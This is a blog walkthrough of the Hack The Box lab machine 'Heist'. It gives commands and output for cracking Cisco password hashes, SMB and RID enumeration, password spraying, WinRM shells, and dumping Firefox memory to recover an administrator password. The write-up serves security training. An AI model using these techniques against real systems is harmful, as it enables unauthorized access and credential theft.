# Hack the Box - Heist Walk-through This blog is related to Computer Security and Ethical hacking and does not promote hacking, cracking, software piracy or any kind of illegal activities. The blog is for informational and educational purpose and for those willing to learn about ethical hacking and penetration testing. You shall not misuse the information to gain unauthorized access. Performing hack attempts (without permission) on computers that you do not own is illegal. # Hola Gente! Today we are going to go over the steps I followed to get root on Heist, a machine on [Hack the Box](http://hacktheboxltd.sjv.io/21oZxQ). Hack The Box is an online platform allowing you to test and advance your skills in cyber security. ### Scanning and Enumeration I kicked off my analysis by conducting a comprehensive scan of the target system using nmap default scripts: ```bash TGT=10.129.96.157 nmap -sSVC -n -oA nmap $TGT ``` **Key findings**: * Port 80: HTTP running Microsoft IIS 10.0. * Port 135: MSRPC. * Port 445: Microsoft SMB service. Visiting the web server on port 80 revealed a "Support Login Page" with an option to log in as a guest: ![](https://cdn.hashnode.com/res/hashnode/image/upload/v1732671008349/8cea4529-aba2-45c2-848f-915ce3586a2e.png align="center") Logging in provided access to download a Cisco configuration file containing encrypted passwords. ![](https://cdn.hashnode.com/res/hashnode/image/upload/v1732671045575/d2d3778e-3df5-48a3-b08c-d4ee6ba33fcf.png align="center") Extract of the config File: ```bash security passwords min-length 12 enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91 ! username rout3r password 7 0242114B0E143F015F5D1E161713 username admin privilege 15 password 7 02375012182C1A1D751618034F36415408 ``` #### Decrypting Passwords The configuration file included encrypted credentials: * User `rout3r`: Cisco Type 7 password. * `enable secret`: Cisco Type 5 hash. Using an online [Cisco Type 7 decryption](https://www.firewall.cx/cisco/cisco-routers/cisco-type7-password-crack.html) tool and `hashcat` with the rockyou wordlist, I cracked the credentials: ```bash hashcat -a 0 -m 500 '$1$pdQG$o8nrSzsGXeaduXrjlvKc91' rockyou.txt -O ``` * `rout3r`: `$uperP@ssword` * Admin password: `Q4)sJu\Y8qz*A3?d` * Enable secret: `stealth1agent` #### SMB Enumeration Armed with the credentials, I tested SMB access using `netexec`: ```bash netexec smb $TGT -u hazard -p stealth1agent SMB 10.129.96.157 445 SUPPORTDESK [*] Windows 10 / Server 2019 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:False) SMB 10.129.96.157 445 SUPPORTDESK [+] SupportDesk\hazard:stealth1agent ``` And then tried to do a little more enumeration with `netexc` and `smbmap` ```bash netexec smb $TGT -u hazard -p stealth1agent --shares SMB 10.129.96.157 445 SUPPORTDESK [*] Windows 10 / Server 2019 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:False) SMB 10.129.96.157 445 SUPPORTDESK [+] SupportDesk\hazard:stealth1agent SMB 10.129.96.157 445 SUPPORTDESK [*] Enumerated shares SMB 10.129.96.157 445 SUPPORTDESK Share Permissions Remark SMB 10.129.96.157 445 SUPPORTDESK ----- ----------- ------ SMB 10.129.96.157 445 SUPPORTDESK ADMIN$ Remote Admin SMB 10.129.96.157 445 SUPPORTDESK C$ Default share SMB 10.129.96.157 445 SUPPORTDESK IPC$ READ Remote IPC ``` ```bash smbmap -u hazard -p stealth1agent -d SupportDesk -H $TGT [*] Detected 1 hosts serving SMB [*] Established 1 SMB session(s) [+] IP: 10.129.96.157:445 Name: 10.129.96.157 Status: Authenticated Disk Permissions Comment ---- ----------- ------- ADMIN$ NO ACCESS Remote Admin C$ NO ACCESS Default share IPC$ READ ONLY Remote IPC ``` I enumerated shares, noting accessible resources and potential avenues for lateral movement. A brute-force RID enumeration revealed several user accounts, including: * `Administrator` * `Guest` * `Hazard` * `Chase` ```bash netexec smb $TGT -u hazard -p stealth1agent --rid-brute SMB 10.129.96.157 445 SUPPORTDESK [*] Windows 10 / Server 2019 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:False) SMB 10.129.96.157 445 SUPPORTDESK [+] SupportDesk\hazard:stealth1agent SMB 10.129.96.157 445 SUPPORTDESK 500: SUPPORTDESK\Administrator (SidTypeUser) SMB 10.129.96.157 445 SUPPORTDESK 501: SUPPORTDESK\Guest (SidTypeUser) SMB 10.129.96.157 445 SUPPORTDESK 503: SUPPORTDESK\DefaultAccount (SidTypeUser) SMB 10.129.96.157 445 SUPPORTDESK 504: SUPPORTDESK\WDAGUtilityAccount (SidTypeUser) SMB 10.129.96.157 445 SUPPORTDESK 513: SUPPORTDESK\None (SidTypeGroup) SMB 10.129.96.157 445 SUPPORTDESK 1008: SUPPORTDESK\Hazard (SidTypeUser) SMB 10.129.96.157 445 SUPPORTDESK 1009: SUPPORTDESK\support (SidTypeUser) SMB 10.129.96.157 445 SUPPORTDESK 1012: SUPPORTDESK\Chase (SidTypeUser) SMB 10.129.96.157 445 SUPPORTDESK 1013: SUPPORTDESK\Jason (SidTypeUser) ``` I created a `users.txt` and `passwords.txt` file and ran a password spray using `netexec`: ```bash netexec smb $TGT -u users.txt -p passwords.txt --continue-on-success ``` And Success! I found valid credentials for user `Chase`: * Username: `Chase` * Password: `Q4)sJu\Y8qz*A3?d` With valid credentials, I confirmed remote access using `netexec winrm`: ```bash netexec winrm $TGT -u Chase -p "Q4)sJu\Y8qz*A3?d" -X "ipconfig" ``` This granted me WinRM access, allowing me to execute commands on the target. #### Exploitation Using `evil-winrm`, I gained an interactive shell and extracted the user flag from the desktop: ```bash evil-winrm -i $TGT -u 'Chase' -p 'Q4)sJu\Y8qz*A3?d' ``` Navigating through the user Desktop, I found and captured the flag. 🎉 ## Privilege Escalation After capturing the user.txt flag and exploring the Desktop, I noticed that there was a todo.txt file: ```bash PS C:\Users\Chase\Desktop>type todo.txt Stuff to-do: 1. Keep checking the issues list. 2. Fix the router config. Done: 1. Restricted access for guest user. ``` After a quick run with [winPEAS](https://github.com/peass-ng/PEASS-ng/blob/master/winPEAS/winPEASexe/README.md) I noticed that there was a Firefox Creds DB file accessible. I tried downloading which took me a while because I kept on trying and kept on getting a 0 bytes file. It turned out that I had to kill the Firefox process before attempting to download. I was finally able to download it. I started trying to crack it, but I had a hard time finding some missing files that were required to crack the credentials. It eventually turned out to be a 4 hour rabbit hole as this wasn't the way to escalate privileges. ![The office crying Meme Generator](https://content.imageresizer.com/images/memes/The-office-crying-meme-5.jpg align="center") Well, back to square one. From Chase's To-Do list he was supposed to check the current issues. Looking at the current processes the only thing that stood out is Firefox. There's a good chance he is the one that’s using it. **Disclaimer**: At this point I had to look for a hint. Forensics isn’t my strongest suit, so I didn’t think about exploring the processes’ memory. Once I realized this was a potential avenue and learned about ProcDump.exe I uploaded and used it to dump Firefox’s Memory: ```powershell *Evil-WinRM* PS C:\Users\Chase\Documents> get-process -name firefox Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName ------- ------ ----- ----- ------ -- -- ----------- 1063 63 112688 201964 2.52 6440 1 firefox *Evil-WinRM* PS C:\Users\Chase\Documents> $command = "C:\Users\Chase\Documents\procdump.exe -accepteula" *Evil-WinRM* PS C:\Users\Chase\Documents> Invoke-Expression $command *Evil-WinRM* PS C:\Users\Chase\Documents> $command = "C:\Users\Chase\Documents\procdump.exe -ma 6440 firefox.dmp" *Evil-WinRM* PS C:\Users\Chase\Documents> Invoke-Expression $command ``` I downloaded the firefox.dmp to my attacker machine (after several tries since they all kept timing out) for further investigation. The dump was was almost 50 MB. At this point I didn’t know what I was looking for. Going back to the /login.php page, I checked with Burp Proxy request/response HTTP messages for a login attempt: ![](https://cdn.hashnode.com/res/hashnode/image/upload/v1732673367616/23de5994-e22a-499a-996a-dfa3328b717b.png align="center") And noticed that the request parameter “login\_password” was being passed as a POST parameter. I then used strings and grep to look for this particular string: ```bash strings -el firefox.dmp | grep login_password "C:\Program Files\Mozilla Firefox\firefox.exe" localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login= localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login= ``` These credentials—`admin@support.htb` and `4dD!5}x/re8]FBuZ`—looked promising! Armed with the newly discovered credentials, I tested them for WinRM access as the Administrator: ```bash netexec winrm $TGT -u Administrator -p '4dD!5}x/re8]FBuZ' WINRM 10.129.96.157 5985 SUPPORTDESK [*] Windows 10 / Server 2019 Build 17763 (name:SUPPORTDESK) (domain:SupportDesk) WINRM 10.129.96.157 5985 SUPPORTDESK [+] SupportDesk\Administrator:4dD!5}x/re8]FBuZ (Pwn3d!) ``` And it worked! And then got a Shell and a Root Flag with Evil-WinRM ```bash evil-winrm -i $TGT -u Administrator -p '4dD!5}x/re8]FBuZ' Evil-WinRM PS C:\Users\Administrator\Documents> type C:\Users\Administrator\Desktop\root.txt ``` ![](https://cdn.hashnode.com/res/hashnode/image/upload/v1732674219876/6d73d712-2210-4cc3-8e4f-2873ba3f19b6.png align="center") ### Lessons Learned * Read and analyze all clues carefully (e.g., `todo.txt`). * Use `get-process` to identify active processes for exploitation. * Memory dumps often reveal sensitive data (e.g., credentials). * Avoid rabbit holes (DAH!); reassess your strategy if you get stuck * `Evil-WinRM` and `Netexec` are your friends ## Call to Action! Thanks for making it this far, If you're enjoying these and haven't joined Hack The Box yet, I invite you to sign up using my [referral link.](http://hacktheboxltd.sjv.io/21oZxQ) Trust me—you'll get hooked! 😊 Until next time!